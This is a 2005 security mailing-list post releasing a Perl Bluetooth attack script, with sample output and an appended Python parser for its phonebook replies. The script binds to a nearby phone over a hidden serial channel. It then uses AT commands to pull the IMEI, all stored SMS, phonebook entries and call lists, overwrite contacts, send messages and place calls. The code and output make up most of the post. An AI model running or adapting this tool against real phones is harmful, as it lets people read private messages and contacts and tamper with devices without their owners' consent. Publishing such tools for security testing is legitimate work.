[TOOL] BlueTest - Bluetooth Scanner

From: SecuriTeam (support_at_securiteam.com)
Date: 07/18/05

    To: list@securiteam.com
    Date: 18 Jul 2005 17:20:26 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      BlueTest - Bluetooth Scanner
    ------------------------------------------------------------------------

    SUMMARY

    DETAILS

    Kroma Pierre wrote a tool that scans for
    <http://en.wikipedia.org/wiki/Bluetooth> Bluetooth devices and then talks
    to a bound phone over a serial (RFCOMM) link using AT commands:

    What can it do?
    1. Search devices
    2. Ping a device (optional)
    3. Bind a device (ex. 6310i)
    4. Extract device information
    5. Extract/manipulate phonebook entries
    6. Extract/manipulate SMS entries (Only Nokia 6310i is supported)
    7. Extract dialed numbers, missed calls, received calls
    8. Make a call (hangup after 20 sec.)

    What do you need to run it?
    1. Mobile device/phone (example: 6310i)
    2. Perl with the modules Device::Gsm, Getopt::Std, Term::ReadLine,
    Device::Modem and Term::ANSIColor
    3. Bluetooth adapter (example: Linksys USBBT100)
    4. Start the script as root (you need root to bind a device at
    /dev/rfcomm0)

    Tool:
    #!/usr/bin/perl
    #
    # bluetooth hacking tool
    #
    # written by pierre kroma
    # kroma@syss.de

    use Device::Gsm;
    use Getopt::Std;
    use Term::ReadLine;
    use Device::Modem;
    use Term::ANSIColor;

    ############## U S A G E ##################
    # -b and -c take an argument (address, channel); -p, -s and -v are flags
    getopts("b:c:psv", \%args);

    system ("clear");
    print "\nBluetooth Pentester\n";
    print "written by pierre kroma (kroma\@syss.de)\n\n";

    if (!defined $args{s}) {
    print qq~
    Usage: perl bluetest.pl -s { -b <bt-addr> -c channel -p -v }
            -b <bt-addr> = hardware address of the target bluetooth device
                           (example: 00:11:22:33:44:55)
            -c <channel> = channel
            -p           = ping the remote device
            -s           = start the script
            -v           = be verbose

    ~; exit;}

    ################# D E F I N I T I O N ##########
    # tools
    my $hcitool="/usr/bin/hcitool";
    my $l2ping ="/usr/bin/l2ping";
    my $rfcomm ="/usr/bin/rfcomm";
    my $lsusb = "/usr/sbin/lsusb";
    my $hciconfig = "/usr/sbin/hciconfig";
    my $bluefw = "/sbin/bluefw";

    # variable
    my $bluedev="hci0";
    my $bt_addr = 0;
    my $channel = $args{c};
    my $i = 0;

    ########## S U B R O U T I N E S #################

    sub init_adapter
    {
     use strict;

     my $busnum = "";
     my $devnum = "";
     # busid 0a12:0001 = linksys USBBT100 usb bluetooth stick
     my $id = `$lsusb 2>/dev/null |grep 0a12:0001`;
     # more generic
     # my $id = `$lsusb 2>/dev/null |grep -i bluetooth`;

     if ( $id =~ /Bus (\d{3}) Device (\d{3}): ID 0a12:0001/ )
     {
      $busnum = $1;
      $devnum = $2;
      system("$bluefw usb $busnum\/$devnum");
      system("$hciconfig $bluedev up");
      sleep(2);   # sleep() takes whole seconds; 1.5 would be truncated to 1
     }
    }

    sub init_modem
    {
     $modem = new Device::Modem( port => '/dev/rfcomm0' );
     if( $modem->connect( baudrate => 9600 ) ) {
            # print "connected!\n";
       } else {
            print "sorry, cannot connect to your serial port!\n";
       }
     # turn off the local echo
     $modem->echo(0);
    }

    sub searching
    {
     print color 'bold blue';
     print "search devices\n";
     print color 'reset';
     my @scan = `$hcitool scan | grep -v "Scanning"`;
     foreach $line (@scan)
     {
      print $i++;
      print $line;
     }
     print "\n";
    }

    sub selecting
    {
     # the readline object is reused by every later prompt, so create it
     # even when the address was given on the command line with -b
     $term = new Term::ReadLine 'bluetooth address reader';

     # select a device
     if($args{'b'})
     {
      $bt_addr = $args{b};
     }
     else
     {
      my $prompt = "Enter hw-addr (example: 00:11:22:33:44:55): ";
      my $OUT = $term->OUT || \*STDOUT;
      $bt_addr = $term->readline($prompt);
     }
    }

    sub ping
    {
     # ping the remote device
     if($args{'p'})
     {
         # ping the remote device
         print color 'bold blue';
         print "\nping the remote device $bt_addr\n";
         print color 'reset';
         die "You must be root to use l2ping!\n" if $> != 0;
         system ("$l2ping -c 5 $bt_addr");
     }
    }

    sub binding
    {
     # binding a device
     print color 'bold blue';
     print "\n\nbind a device to $bt_addr \t\t";
     print color 'reset';
     if($args{'c'})
     {
      $channel = $args{c};
     }
     else
     {
      # setting default nokia 6310i hidden channel 17 or 18
      $channel = 17;
     }

     system("$rfcomm release $bluedev 2>/dev/null");
     sleep(2);
     system("$rfcomm bind $bluedev $bt_addr $channel 2>/dev/null");
     sleep(2);

     # Connect to the mobile phone
     # for devfs
     # my $gsm = new Device::Gsm( port => '/dev/bluetooth/rfcomm/0' );

     # for udev
     $gsm = new Device::Gsm( port => '/dev/rfcomm0' );

       if( $gsm->connect() )
     {
      print color 'bold green';
            print "connected!\n";
      print color 'reset';
       }
     else
     {
      print color 'bold red';
            print "sorry, no connection with gsm phone on serial port!\n";
      print color 'reset';
      exit (1);
       }

     # Register to GSM network
     $gsm->register();
    }

    sub manu
    {
     # Extract the manufacturer
     my $man_name = $gsm->manufacturer();
     print "manufacture: $man_name \n";
    }

    sub model
    {
     # model
     my $model = $gsm->model();
     print "model: $model \n";
    }

    sub sw
    {
     # software revision
     $modem->atsend( 'AT+CGMR' . Device::Modem::CR );
       $rev = $modem->answer();
     $rev =~ s/\r//g;
     $rev =~ s/OK//g;
     print "software revision: \n \n $rev";
     sleep(1);
    }

    sub imei
    {
     # Extract the IMEI number
     my $imei = $gsm->imei();
     $imei =~ s/\r//g;
     $imei =~ s/OK//g;
     print "IMEI: (International Mobile Equipment Identifier) = $imei \n\n";
    }

    sub readbook
    {
     print color 'bold blue';
     print "\n\nextract the phonebook\n\n";
     print color 'reset';
     if($args{'v'})
     {
     print "storagelocation:";
     print qq~
    ME => storage: device
    SM => storage: SIM-card
    MT => combination of ME + SM (doesn't work for my 6310i)
    BM => storage: CB-news
     ~;
     }
      
     print "\nsupported storage location";
     $modem->atsend( 'AT+CPMS=?' . Device::Modem::CR );
       $types = $modem->answer();
     $types =~ s/\r//g;
            $types =~ s/\n//g;
     $types =~ s/OK//g;
     $types =~ s/\+CPMS//g;
     print "$types \n";
     
     print "\ncurrent phonebooksource";
     $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
       $source = $modem->answer();
     $source =~ s/\r//g;
            $source =~ s/\n//g;
     $source =~ s/OK//g;
     $source =~ s/\+CPBS//g;
     print $source;
     print "\n\n";

     print "\ncurrent used storage on device";
     $command="AT+CPBS=\"ME\"";
     $modem->atsend( $command . Device::Modem::CR );
     $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
       $memory = $modem->answer();
     $memory =~ s/\r//g;
            $memory =~ s/\n//g;
     $memory =~ s/OK//g;
     $memory =~ s/\+CPBS//g;
     print $memory;

     print "\ncurrent used storage on SIM";
     $command="AT+CPBS=\"SM\"";
     $modem->atsend( $command . Device::Modem::CR );
     $modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
       $source = $modem->answer();
     $source =~ s/\r//g;
            $source =~ s/\n//g;
     $source =~ s/OK//g;
     $source =~ s/\+CPBS//g;
     print $source;
     print "\n\n";

     my $prompt = "What do you want to readout? (ME oder SM) : ";
     my $OUT = $term->OUT || \*STDOUT;
     $type = $term->readline($prompt);

     $command = "AT+CPBS=\"$type\"";
     $modem->atsend( $command . Device::Modem::CR );
       $asource = $modem->answer();
     $asource =~ s/\r//g;
            $asource =~ s/\n//g;
     $asource =~ s/OK//g;
     print $asource;

     my $prompt = "starting from entry (>=0): \t ";
     my $OUT = $term->OUT || \*STDOUT;
     $start = $term->readline($prompt);
     print "\n";
     my $prompt = "ending to entry:\t\t";
     my $OUT = $term->OUT || \*STDOUT;
     $max = $term->readline($prompt);
     print "\n";

     if ( $start > $max || $start <= 0 )
     {
      print "oops damn f*cking long night? \n";
      print "initial value <= 0? \n";
      print "or initial value > final value? \n";
      exit (1);
     }
     list_entries ();

     print "\nextract last 5 dialled numbers: \n";
     $command = "AT+CPBS=\"DC\"";
     $modem->atsend( $command . Device::Modem::CR );
       $asource = $modem->answer();
     $asource =~ s/\r//g;
            $asource =~ s/\n//g;
     $asource =~ s/OK//g;
     print $asource;
     $start=1;
     $max=5;
     list_entries ();

     print "\nlast 5 missed calls: \n";
     $command = "AT+CPBS=\"MC\"";
     $modem->atsend( $command . Device::Modem::CR );
       $asource = $modem->answer();
     $asource =~ s/\r//g;
            $asource =~ s/\n//g;
     $asource =~ s/OK//g;
     print $asource;
     $start=1;
     $max=5;
     list_entries ();

     print "\nlast 5 received calls: \n";
     $command = "AT+CPBS=\"RC\"";
     $modem->atsend( $command . Device::Modem::CR );
       $asource = $modem->answer();
     $asource =~ s/\r//g;
            $asource =~ s/\n//g;
     $asource =~ s/OK//g;
     print $asource;
     $start=1;
     $max=5;
     list_entries ();
    }

    sub list_entries
    {
     $i = $start;
     foreach $i ( $start..$max )
     {
      $command = "AT+CPBR=$i";
      $modem->atsend( $command . Device::Modem::CR );
      $entry = $modem->answer();

      # format
      $entry =~ s/\r//g;
             $entry =~ s/\n//g;
      $entry =~ s/OK//g;

      # parse
      # type = 145 = international format = number starts with +
      # type = 129 = unknown number format = didn't start with +

             ( $pos, $num, $type, $tag ) = $entry =~ m/^\+CPBR: ($i),"(.+?)",(\d+),"(.+)?"\r?$/m;

      $type =~ s/145/international/g;
      $type =~ s/129/unknown/g;

      # an empty slot answers with a bare OK, so nothing is captured
      if ( !defined $num || $num eq '' )
      {
       print "entry $i: is empty \n";
      }
      else
      {
       print "entry $i: $num, $type, $tag \n";
       
      }
     }
    }

    sub sendsms
    {
     # Send a text message quickly
     print color 'bold blue';
     print "\n\nwrite a message (SMS)\n";
     print color 'reset';
     print "\n";
     my $prompt = "recipient (example +4912345678): ";
     my $OUT = $term->OUT || \*STDOUT;
     $recipient = $term->readline($prompt);
     print "\n";

     my $prompt = "message: ";
     my $OUT = $term->OUT || \*STDOUT;
     $message = $term->readline($prompt);

     my $status = $gsm->send_sms(
              recipient => $recipient,
              content => $message
        );
     if ( $status )
     {
      print color 'bold green';
      print "\nmessage transmitted successfully.\n";
      print color 'reset';
     }
     else
     {
      print color 'bold red';
      print "\nERROR: message couldn't be delivered.\n" ;
      print color 'reset';
     }
     sleep(2);
    }

    sub readsms
    {
     # Get list of device::Gsm::Sms message objects
     # see `examples/read_messages.pl' for all details
     
     # get mode status
     $modem->atsend( 'AT+CMGF?' . Device::Modem::CR );
     print color 'bold blue';
     print "\nSMS Menu";
     print color 'reset';
     print "\n \ncurrent sms status (0=PDU, 1=text)";
       my $status = $modem->answer();
     $status =~ s/\r//g;
            $status =~ s/\n//g;
     $status =~ s/OK//g;
     $status =~ s/\+CMGF//g;
     print $status;
     sleep(2);
     
     # switch to text mode (does not work with 6310i)
     # print "switch to text mode \n";
     # $modem->atsend( 'AT+CMGF=1' . Device::Modem::CR );
       # print $modem->answer();

     print "\n\nextract all sms \n";
     $modem->atsend( 'AT+CMGL=4' . Device::Modem::CR );
       my $extract = $modem->answer();
     $extract =~ s/OK//g;
     $extract =~ s/\+CMGL://g;
     sleep(2);
     print $extract;
     
    }

    sub call
    {
     # read number
     print color 'bold blue';
     print "\n\nmaking a call\n";
     print color 'reset';
     print "\n";
     my $prompt = "Which number should be called? (example: 004970714078560): ";
     my $OUT = $term->OUT || \*STDOUT;
     $number = $term->readline($prompt);
     print "\ncalling $number \n";
     my $max = 20;
     if (my $pid = fork)
     {
      # parent: place the call, then wait for the child to hang up
      $modem->dial( $number );
      waitpid($pid, 0);
     }
     else
     {
      # child: count down, hang up, then exit so only one process continues
      print "waiting $max seconds before ring off: ";
      $i = 0;
      foreach $i ( 1..$max )
      {
       print "$i ";
       sleep(1);
      }
      print "\n";
      $modem->hangup();
      exit (0);
     }
    }

    sub writebook
    {
     print color 'bold blue';
     print "\ncreate a phonebook entry";
     print color 'reset';
     print "\n";
     my $prompt = "storage space number (ATTENTION: you may overwrite an existing entry:): ";
     my $OUT = $term->OUT || \*STDOUT;
     $nr = $term->readline($prompt);
     print "\n";
     my $prompt = "phone-number (format +49123456789): ";
     my $OUT = $term->OUT || \*STDOUT;
     $tel = $term->readline($prompt);
     print "\n";
     my $prompt = "name: ";
     my $OUT = $term->OUT || \*STDOUT;
     $name = $term->readline($prompt);
     print "\n";
     my $prompt = "storage location (ME=device, SM=SIM): ";
     my $OUT = $term->OUT || \*STDOUT;
     $place = $term->readline($prompt);

     $command="AT+CPBS=\"$place\"";
     $modem->atsend( $command . Device::Modem::CR );

     $command="AT+CPBW=$nr,\"$tel\",145,\"$name\"";
     $modem->atsend( $command . Device::Modem::CR );
       $source = $modem->answer();
     $source =~ s/\r//g;
            $source =~ s/\n//g;
     $source =~ s/OK//g;
     print $source;

     print "\n\nchecking......";
     $start = $nr - 5;
     $max = 5;
     if ( $start <= 0 )
     {
      $start = $nr;
     }
     $max = $nr + 5;
     print "\n extract your phonebook from storage space number $start to $max \n";
     list_entries ();
     print "\n";
    }

    sub key
    {
     my $message = "- press any key -";
     my $OUT = $term->OUT || \*STDOUT;
     $term->readline($message);
    }

    sub final
    {
     #system ('cat ./logo.txt');
     print color 'bold red';
     print "\t\t\t\twritten by pierre kroma (kroma\@syss.de)\n\n";
     print color 'reset';
     $modem->disconnect();
     print "\n";
    }
     

    ############### M A I N ################

    init_adapter ();
    searching ();
    selecting ();
    ping ();
    binding ();
    init_modem ();
    print color 'bold blue';
    print "\nextract device information\n";
    print color 'reset';
    manu ();
    model ();
    sw ();
    imei ();
    key();
    readsms ();
    sendsms ();
    key ();
    readbook ();
    writebook ();
    key ();
    call ();
    key ();
    final ();

    Example results:
    ###
    # test: #
    ###

    Bluetooth Pentester
    written by pierre kroma (kroma@syss.de)

    search devices
    0 00:60:57:XX:XX:XX Exploit

    Enter hw-addr (example: 00:11:22:33:44:55): 00:60:57:XX:XX:XX

    bind a device to 00:60:57:XX:XX:XX connected!

    extract device information
    manufacture: Nokia
    model: Nokia 6310i
    software revision:
     
     V 5.51
    08-07-03
    NPL-1
    (c) NMP.

    IMEI: (International Mobile Equipment Identifier) = XXXXXXXXXXXXXXXX

    - press any key -

    SMS Menu
     
    current sms status (0=PDU, 1=text): 0

    extract all sms
     1,1,,159
    0791971 ----------- c u t ---------------- ( ;-) )

    write a message (SMS)

    recipient (example +4912345678): +491727777777
    message: SMILE

    message transmitted successfully.

    extract the phonebook

    supported storage location: ("ME","SM"),("ME","SM"),("MT")

    current phonebooksource: "SM",16,100

    current used storage on device: "ME",9,500
    current used storage on SIM: "SM",16,100

    What do you want to readout? (ME oder SM) : SM
    starting from entry (>=0): 18
    ending to entry: 30

    entry 18: is empty
    entry 19: is empty
    entry 20: +49110, international, SySS-Hotline
    entry 21: +4917222442, international, D2-Blumengruss
    entry 22: +4917222334, international, D2-Events
    entry 23: +4911880, international, Telefonauskunft
    entry 24: +4917222333, international, D2-Hotelservice
    entry 25: 22444, unknown, D2-Wetterinfo
    entry 26: 222222, unknown, D2-ADAC Pannenhilf
    entry 27: +4917222330, international, D2-Reiseservice
    entry 28: 22666, unknown, D2-PassoVoice
    entry 29: 22922, unknown, D2-Konto-Server
    entry 30: 22933, unknown, D2-HandyBrse

    extract last 5 dialled numbers:
    entry 1: 012334566, unknown,
    entry 2: 0123454566, unknown,
    entry 3: 09345739857, unknown,
    entry 4: 09287429184, unknown,
    entry 5: +49123456789, international,

    last 5 missed calls:
    entry 1: +49110, international,
    entry 2: +4919222, international,
    entry 3: +49112, international,
    entry 4: is empty
    entry 5: is empty

    last 5 received calls:
    entry 1: is empty
    entry 2: +4970714078560, international,
    entry 3: +4900001111111, international,
    entry 4: +4911111111111, international,
    entry 5: +49123456789, international,

    create a phonebook entry
    storage space number (ATTENTION: you may overwrite an existing entry:): 19
    phone-number (format +49123456789): +49666666
    name: Callgirl

    storage location (ME=device, SM=SIM): SM

    checking......
     extract your phonebook from storage space number 14 to 24
    entry 14: is empty
    entry 15: is empty
    entry 16: is empty
    entry 17: is empty
    entry 18: is empty
    entry 19: +49666666, international, Callgirl
    entry 20: +49110, international, SySS-Hotline
    entry 21: +4917222442, international, D2-Blumengruss
    entry 22: +4917222334, international, D2-Events
    entry 23: +4911880, international, Telefonauskunft
    entry 24: +4917222333, international, D2-Hotelservice

    making a call
    Which number should be called? (example: 004970714078560): 004970714078560
    calling 004970714078560
    waiting 20 seconds before ring off: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
    17 18 19 20
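
    The phonebook replies the tool prints raw above (the AT+CPBS? storage report such as "SM",16,100 and the +CPBR: records with the 145/129 type codes) parsed into structured values, as an added example that is not part of the original advisory or Kroma's tool. It is written in Python rather than the tool's Perl; the modem replies are constructed to match the 6310i output shown, and the empty-slot case (a bare OK with no +CPBR line) is handled instead of relying on a numeric compare against an empty string.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Number-type codes as the tool's comments describe them (3GPP TS 27.007):
# 145 = international format (number starts with '+'), 129 = unknown/national.
TYPE_NAMES = {145: "international", 129: "unknown"}

@dataclass
class StorageStatus:
    storage: str  # "ME" (device), "SM" (SIM), "DC"/"MC"/"RC" (call lists)
    used: int
    total: int

@dataclass
class PhonebookEntry:
    index: int
    number: str
    type_code: int
    tag: str

    @property
    def type_name(self) -> str:
        return TYPE_NAMES.get(self.type_code, str(self.type_code))

# Result lines are CRLF-framed; \s* before $ absorbs the trailing \r.
CPBS_RE = re.compile(r'^\+CPBS:\s*"(\w+)",(\d+),(\d+)\s*$', re.M)
CPBR_RE = re.compile(r'^\+CPBR:\s*(\d+),"([^"]*)",(\d+),"([^"]*)"\s*$', re.M)

def parse_cpbs(answer: str) -> Optional[StorageStatus]:
    """Reply to AT+CPBS?: current storage, used slots, total slots (None on ERROR)."""
    m = CPBS_RE.search(answer)
    return StorageStatus(m.group(1), int(m.group(2)), int(m.group(3))) if m else None

def parse_cpbr(answer: str, index: int) -> Optional[PhonebookEntry]:
    """Reply to AT+CPBR=<index>. An empty slot answers with a bare OK and no
    +CPBR line, which the tool reports as 'is empty'; return None for that."""
    for m in CPBR_RE.finditer(answer):
        if int(m.group(1)) == index:
            return PhonebookEntry(index, m.group(2), int(m.group(3)), m.group(4))
    return None

def format_entry(index: int, entry: Optional[PhonebookEntry]) -> str:
    """Same one-line layout the tool prints for each slot."""
    if entry is None:
        return f"entry {index}: is empty"
    return f"entry {index}: {entry.number}, {entry.type_name}, {entry.tag}"

def list_entries(answers: Dict[int, str], start: int, end: int) -> List[str]:
    """Counterpart of the tool's list_entries loop over AT+CPBR=start..end.
    `answers` maps slot index -> raw modem reply (the tool reads modem->answer())."""
    if start < 1 or start > end:
        raise ValueError("start must be >= 1 and not greater than end")
    return [format_entry(i, parse_cpbr(answers.get(i, "OK\r\n"), i))
            for i in range(start, end + 1)]

# Constructed replies shaped like the 6310i output in the advisory: echoed
# command, CRLF framing and the final OK are what a phone actually sends.
SAMPLE_CPBS = 'AT+CPBS?\r\r\n+CPBS: "SM",16,100\r\n\r\nOK\r\n'
SAMPLE_CPBR = {
    18: 'AT+CPBR=18\r\r\n\r\nOK\r\n',                               # empty slot
    20: 'AT+CPBR=20\r\r\n+CPBR: 20,"+49110",145,"SySS-Hotline"\r\n\r\nOK\r\n',
    25: '+CPBR: 25,"22444",129,"D2-Wetterinfo"\r\n\r\nOK\r\n',
}
SAMPLE_ERROR = 'AT+CPBS?\r\r\n+CME ERROR: 21\r\n'
```

    Calling list_entries(SAMPLE_CPBR, 18, 25) reproduces the "entry N: ..." lines of the readout above from the constructed replies.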

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:kroma@syss.de> Kroma Pierre.
